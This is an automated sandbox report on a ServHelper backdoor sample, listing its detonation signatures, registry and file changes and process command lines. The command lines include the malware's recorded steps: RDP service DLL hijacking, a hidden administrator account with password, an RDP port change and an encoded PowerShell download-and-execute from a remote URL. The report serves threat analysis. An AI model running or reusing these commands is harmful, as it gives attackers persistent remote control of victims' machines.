Malware Analysis Report

2024-10-23 17:54

Sample ID 210819-x8edhfxkba
Target 87dd0632a95ca24443f8c6363bc055e6
SHA256 266562d82899806c0eafc3ca72216e78d41403dd24effebd31d7635922ba96ce
Tags
servhelper backdoor discovery exploit persistence suricata trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

266562d82899806c0eafc3ca72216e78d41403dd24effebd31d7635922ba96ce

Threat Level: Known bad

The file 87dd0632a95ca24443f8c6363bc055e6 was found to be: Known bad.

Malicious Activity Summary

servhelper backdoor discovery exploit persistence suricata trojan upx

ServHelper

suricata: ET MALWARE ServHelper CnC Inital Checkin

Grants admin privileges

Sets DLL path for service in the registry

Possible privilege escalation attempt

UPX packed file

Modifies RDP port number used by Windows

Blocklisted process makes network request

Loads dropped DLL

Modifies file permissions

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Suspicious behavior: EnumeratesProcesses

Modifies data under HKEY_USERS

Suspicious behavior: LoadsDriver

Script User-Agent

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Runs net.exe

Modifies system certificate store

Modifies registry key

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2021-08-19 19:34

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2021-08-19 19:34

Reported

2021-08-19 19:37

Platform

win7v20210410

Max time kernel

127s

Max time network

141s

Command Line

"C:\Users\Admin\AppData\Local\Temp\87dd0632a95ca24443f8c6363bc055e6.exe"

Signatures

ServHelper

trojan backdoor servhelper

suricata: ET MALWARE ServHelper CnC Inital Checkin

suricata

Grants admin privileges

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies RDP port number used by Windows

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Sets DLL path for service in the registry

persistence

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\rfxvmt.dll C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\Basebrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bee17986-15c4-4c8d-85d2-55b56bb1846f C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3b45f730-fdb1-48e4-8141-bb9df07dca2a C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fd3e632c-9d06-4bfd-8128-2f6d090bac07 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasrv.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\wupsvc.jpg C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_429cbdbb-4b58-4d03-a777-a8424b2f55b3 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3ebffb5e-7278-439b-9b61-8d58e35862f4 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_39276cc2-c878-4a8a-ba82-226e04ca3519 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_df82724e-8309-40e0-97c5-30a2daf821ef C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\ShellBrd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P6KBSB4RJ1KUQT87P85I.temp C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4c2033ff-1b9a-4bab-adcf-aa80c4c89a81 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_54b54f4e-9ea0-40ad-97d7-5bb6ba83d64f C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\branding\mediasvc.png C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a4fe9dd2-52f5-437a-9271-cbefc4089f9c C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2f746b57-82a9-4b19-97b4-60cc08b36ecd C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 10825fed3195d701 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A
Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\Wbem\WMIC.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\87dd0632a95ca24443f8c6363bc055e6.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 C:\Users\Admin\AppData\Local\Temp\87dd0632a95ca24443f8c6363bc055e6.exe N/A

Runs net.exe

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\87dd0632a95ca24443f8c6363bc055e6.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 916 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\87dd0632a95ca24443f8c6363bc055e6.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 916 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\87dd0632a95ca24443f8c6363bc055e6.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 916 wrote to memory of 572 N/A C:\Users\Admin\AppData\Local\Temp\87dd0632a95ca24443f8c6363bc055e6.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 572 wrote to memory of 984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 572 wrote to memory of 984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 572 wrote to memory of 984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 984 wrote to memory of 592 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 984 wrote to memory of 592 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 984 wrote to memory of 592 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 572 wrote to memory of 1784 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 572 wrote to memory of 1784 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 572 wrote to memory of 1784 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 572 wrote to memory of 300 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 572 wrote to memory of 300 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 572 wrote to memory of 300 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 572 wrote to memory of 1988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 572 wrote to memory of 1988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 572 wrote to memory of 1988 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 572 wrote to memory of 792 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 572 wrote to memory of 792 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 572 wrote to memory of 792 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\takeown.exe
PID 572 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 572 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 572 wrote to memory of 1144 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 572 wrote to memory of 1936 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 572 wrote to memory of 1936 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 572 wrote to memory of 1936 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 572 wrote to memory of 1592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 572 wrote to memory of 1592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 572 wrote to memory of 1592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 572 wrote to memory of 1652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 572 wrote to memory of 1652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 572 wrote to memory of 1652 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 572 wrote to memory of 1680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 572 wrote to memory of 1680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 572 wrote to memory of 1680 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 572 wrote to memory of 952 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 572 wrote to memory of 952 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 572 wrote to memory of 952 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 572 wrote to memory of 1632 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 572 wrote to memory of 1632 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 572 wrote to memory of 1632 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\icacls.exe
PID 572 wrote to memory of 1388 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 572 wrote to memory of 1388 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 572 wrote to memory of 1388 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 572 wrote to memory of 1676 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 572 wrote to memory of 1676 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 572 wrote to memory of 1676 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 572 wrote to memory of 1484 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 572 wrote to memory of 1484 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 572 wrote to memory of 1484 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 572 wrote to memory of 1036 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 572 wrote to memory of 1036 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 572 wrote to memory of 1036 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 1036 wrote to memory of 1600 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1036 wrote to memory of 1600 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1036 wrote to memory of 1600 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 572 wrote to memory of 944 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 572 wrote to memory of 944 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 572 wrote to memory of 944 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 944 wrote to memory of 1376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 944 wrote to memory of 1376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 944 wrote to memory of 1376 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1376 wrote to memory of 1960 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe

Processes

C:\Users\Admin\AppData\Local\Temp\87dd0632a95ca24443f8c6363bc055e6.exe

"C:\Users\Admin\AppData\Local\Temp\87dd0632a95ca24443f8c6363bc055e6.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\njncjljq\njncjljq.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES99C0.tmp" "c:\Users\Admin\AppData\Local\Temp\njncjljq\CSC30F7DDE84DB24FD2A41B632FCDB1EC79.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile

C:\Windows\system32\takeown.exe

"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators

C:\Windows\system32\icacls.exe

"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc 000000 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc XOlGjCZN /add

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc XOlGjCZN /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc XOlGjCZN /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MRBKYMNO$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user WgaUtilAcc XOlGjCZN

C:\Windows\system32\net.exe

net.exe user WgaUtilAcc XOlGjCZN

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user WgaUtilAcc XOlGjCZN

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

